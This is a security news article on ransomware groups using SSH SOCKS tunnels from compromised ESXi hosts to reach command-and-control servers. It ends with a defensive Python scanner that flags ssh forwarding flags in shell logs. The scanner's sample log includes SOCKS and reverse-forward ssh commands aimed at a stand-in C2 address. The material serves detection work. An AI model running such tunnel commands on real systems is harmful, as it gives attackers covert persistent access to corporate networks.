Cybersecurity researchers have identified a worrying trend in ransomware attacks targeting ESXi systems. These attacks not only compromise the systems but also use them to create covert communication channels with command-and-control infrastructure. By exploiting unmonitored ESXi appliances, threat actors employ techniques that blend into legitimate traffic, making detection challenging. Researchers emphasize the importance of monitoring specific log files to detect suspicious tunneling activity and highlight how hard it can be to access these critical logs during forensic investigations.
Unmonitored ESXi appliances are increasingly exploited both as a persistence mechanism and as a gateway into the wider corporate network, Sygnia researchers noted.
Threat actors use these platforms by adopting 'living-off-the-land' techniques, relying on native tools such as SSH to establish a SOCKS tunnel between the compromised ESXi host and their C2 servers.
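The tunneling described above leaves a trace wherever the hypervisor records commands run from its shell, which is one reason the researchers stress log monitoring. The following is an added example, not code from the article or from Sygnia: a small scanner that reads shell-history style log lines and flags `ssh` invocations that request port forwarding (SOCKS `-D`, reverse `-R`, local `-L`, or tunnel-device `-w`), with `-N`/`-f` reported as supporting indicators. The sample log lines are constructed to approximate the layout of an ESXi `shell.log` entry (timestamp, `shell[pid]`, user, command); the exact on-disk format of a real appliance, and which forwarding flags the appliance's own SSH client accepts, are assumptions the reader should confirm against their environment.

```python
import re
import shlex
from dataclasses import dataclass, field
from typing import List

# Constructed sample lines approximating an ESXi shell.log (commands run in the
# ESXi shell). Format and content are assumptions, not captured output.
# 203.0.113.10 is a documentation-range address standing in for a C2 host.
SAMPLE_SHELL_LOG = """\
2024-05-01T10:02:11Z shell[2099521]: [root]: esxcli system version get
2024-05-01T10:03:45Z shell[2099521]: [root]: ssh -fN -D 1080 svc@203.0.113.10
2024-05-01T10:04:02Z shell[2099521]: [root]: ssh -N -R 2222:127.0.0.1:22 svc@203.0.113.10
2024-05-01T10:05:30Z shell[2099521]: [root]: vim-cmd vmsvc/getallvms
2024-05-01T10:06:00Z shell[2099521]: [root]: ssh root@10.0.0.5 uptime
"""

# Assumed line layout: "<timestamp> shell[<pid>]: [<user>]: <command>"
LINE_RE = re.compile(r'^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$')

# OpenSSH-style single-letter options that set up a tunnel (primary) or
# typically accompany one (supporting: no remote command, go to background).
PRIMARY_FLAGS = {
    'D': 'socks-proxy(-D)',
    'R': 'reverse-forward(-R)',
    'L': 'local-forward(-L)',
    'w': 'tun-device(-w)',
}
SUPPORTING_FLAGS = {
    'N': 'no-command(-N)',
    'f': 'background(-f)',
}


@dataclass
class Finding:
    timestamp: str
    user: str
    command: str
    indicators: List[str] = field(default_factory=list)


def classify_ssh_command(cmd: str) -> List[str]:
    """Return indicator names for an ssh command line; [] if not ssh or no flags."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:          # unbalanced quotes: fall back to naive split
        tokens = cmd.split()
    if not tokens or tokens[0].rsplit('/', 1)[-1] != 'ssh':
        return []
    indicators = []
    for tok in tokens[1:]:
        if not tok.startswith('-') or tok.startswith('--'):
            continue
        # Only the leading letters of a bundled option group are flags;
        # "-R2222:localhost:22" contributes just "R", not the host text.
        m = re.match(r'[A-Za-z]+', tok[1:])
        if not m:
            continue
        for ch in m.group(0):
            if ch in PRIMARY_FLAGS:
                indicators.append(PRIMARY_FLAGS[ch])
            elif ch in SUPPORTING_FLAGS:
                indicators.append(SUPPORTING_FLAGS[ch])
    return indicators


def scan_shell_log(text: str) -> List[Finding]:
    """Flag commands that request SSH port forwarding; supporting-only flags are ignored."""
    findings = []
    primary = set(PRIMARY_FLAGS.values())
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ind = classify_ssh_command(m['cmd'])
        if any(i in primary for i in ind):
            findings.append(Finding(m['ts'], m['user'], m['cmd'], ind))
    return findings


if __name__ == '__main__':
    for f in scan_shell_log(SAMPLE_SHELL_LOG):
        print(f"{f.timestamp} {f.user}: {f.command}  <-- {', '.join(f.indicators)}")
```

Matching on option letters rather than on a fixed command string keeps the check stable when the flags are bundled (`-fN`) or glued to their argument (`-R2222:...`). An `ssh` session that forwards nothing, like the `uptime` call in the sample, is deliberately not reported, so the rule stays quiet on routine administrative use of SSH from the host.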